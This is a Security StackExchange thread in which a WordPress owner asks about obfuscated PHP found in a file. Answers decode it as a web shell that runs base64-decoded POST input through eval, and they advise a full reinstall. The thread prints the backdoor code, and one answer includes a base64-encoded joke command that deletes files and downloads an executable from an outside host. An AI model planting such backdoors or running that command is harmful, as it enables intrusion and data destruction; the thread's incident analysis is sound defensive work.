6

My site is built using Wordpress. One day it stopped working and found an error in one PHP file.

When I downloaded that PHP file to see what happened, my antivirus (Microsoft Security Essentials) detects it as a threat and deleted the downloaded file.

Luckily I can access my hosting's cPanel and edit the problematic PHP file from there.

I found that some unusual code is appended at the start of the code. (I deleted the code and everything works fine, for now)

Here's the code:

<?php $lro89 = "t_cepodas6b4";$gmat6 =strtolower( $lro89[10]. $lro89[7]. $lro89[8]. $lro89[3] . $lro89[9].$lro89[11].$lro89[1] . $lro89[6].$lro89[3]. $lro89[2].$lro89[5].$lro89[6].$lro89[3]);$scs1 =strtoupper ( $lro89[1]. $lro89[4]. $lro89[5].$lro89[8]. $lro89[0]); if (isset (${$scs1 }[ 'n3d9ebc' ])) {eval($gmat6( ${ $scs1} ['n3d9ebc' ])) ;}?>

Reformatted for readability:

<?php
$lro89 = "t_cepodas6b4";
$gmat6 =strtolower( $lro89[10]. $lro89[7]. $lro89[8]. $lro89[3] . $lro89[9].$lro89[11].$lro89[1] . $lro89[6].$lro89[3]. $lro89[2].$lro89[5].$lro89[6].$lro89[3]);
$scs1 =strtoupper ( $lro89[1]. $lro89[4]. $lro89[5].$lro89[8]. $lro89[0]);
if (isset (${$scs1 }[ 'n3d9ebc' ])) {
    eval($gmat6( ${ $scs1} ['n3d9ebc' ])) ;
}
?>

I have few questions:

  1. What does the code do?
  2. Does it mean that there's a virus?
  3. How can it be injected to only this one file?
topher
  • 313
  • 3
  • 9
  • 1
    Also, [this](http://security.stackexchange.com/questions/39231/how-do-i-deal-with-a-compromised-server) is some good reading. You are most likely still infected. – Anders Dec 22 '16 at 07:00
  • 2
    Another "evil PHP file" question, and yet again the Wordpress tag is present. When will people learn to not use that piece of crap and move to sane alternatives? Also beware of any host that uses CPanel - that's full of vulnerabilities as well. – André Borie Dec 22 '16 at 09:00
  • @AndréBorie I would like to know more about Wordpress and CPanel vulnerabilities, and also want to move to the better alternatives. Can you please tell me more? What are the better options? – topher Dec 23 '16 at 15:18
  • 1
    @topher Ghost is a pretty good Wordpress alternative. As for CPanel there is no good alternative as they all suck. The best workaround is to learn command-line system administration so you don't have to rely on those crappy web interfaces. – André Borie Dec 23 '16 at 15:49

2 Answers2

12

What does the code do?

<?php
    if (isset($_POST['n3d9ebc'])) {
        eval(base64_decode($_POST['n3d9ebc']));
    }
?>

It does Remote Code Execution. If this were a $_GET[] parameter, it means an attacker could do this:

hxxp://yoursite.com/hax.php?n3d9ebc=base64-encoded-malicious-php-code

But since it's a $_POST[] parameter, it'll be sent as part of a submission. When the POST parameter, n3d9ebc, is set, it will attempt to evaluate the condition after it's been base64 decoded.

Example payload:

c2hlbGxfZXhlYygicm0gLXJmIH4vaGlsbGFyeS1lbWFpbHM7IHdnZXQgaHR0cHM6Ly93d3cucHV0aW4ucnUvZmFuY3ktYmVhci5leGUgLU8gYXB0MjguZXhlICYmIHN1ZG8gbXYgYXB0MjguZXhlIC91c3Ivc2JpbjsgZWNobyBTSFVUIFVQIFRISVMgSVMgQSBKT0tFIik7

The above will do... um... figure it out.

Just by posting to your site, they have full Remote Code Execution on your web server. You've essentially been pwned. Time for a clean up, and make sure you upgrade vulnerable components.

Does it mean that there's a virus?

Technically? They can do whatever they want on your website. It's basically a backdoor.

How can it be injected to only this one file?

You probably have some kind of vulnerability which allows them to write to a file on the web server. Could be any number of issues. Kind of broad, but it could be chmod 777, a Remote File Inclusion issue, or some other Remote Code Execution backdoor or vulnerability.

Mark Buffalo
  • 22,508
  • 8
  • 74
  • 91
  • 3
    The URL should be https://www.base64decode.org/ (not encode). – A.L Dec 22 '16 at 08:46
  • @A.L Fixed, but I figured people could click the "decode" button. – Mark Buffalo Dec 22 '16 at 17:03
  • @Walfrat Yep, but I am adding that as an example. Will update for clarity. – Mark Buffalo Dec 22 '16 at 17:04
  • 1
    in fact I was talking about the next block of quote, I didn't noticed the GET parameter in the PHP code it's `$_POST` so the payload is in the request body not the URL. I don't want to be annoying or pedantic about it but it can be confusing for beginners^^' – Walfrat Dec 25 '16 at 15:34
  • @Walfrat No, it's fine. You should be "annoying and pedantic" about these things. Yeah, I admit this is confusing to beginners, so I'm going to edit it. – Mark Buffalo Dec 25 '16 at 18:31
8

Your Wordpress got compromised.

What does the code do?

It's a mildly obfuscated minimal web shell. It takes the POST parameter n3d9ebc, base64-decodes it and executes the result as PHP code. This means that an attacker could use the script to execute arbitrary code on your server at any time.

That's the cleaned-up code:

<?php
if (isset($_POST['n3d9ebc'])) {
    eval(base64_decode($_POST['n3d9ebc']));
}
?>

The variable names were obfuscated to make the script harder to read and to prevent automated detection. The base64 conversion is another measure to help against IDS. Since it's a POST parameter, the attacker's commands also don't show up in the server logfiles.

Does it mean that there's a virus?

It means somebody got write access to your Wordpress (maybe via vulnerable plugins) and uploaded this script as a backdoor.

How can it be injected to only this one file?

Well, it has to be put somewhere. Attackers often decide to append malicious code to an existing file since it's less noticeable than creating a new one.

(I deleted the code and everything works fine, for now)

Can you be sure that there are no more backdoors? If you got compromised, the best way to proceed is a fresh installation.

Arminius
  • 44,242
  • 14
  • 143
  • 138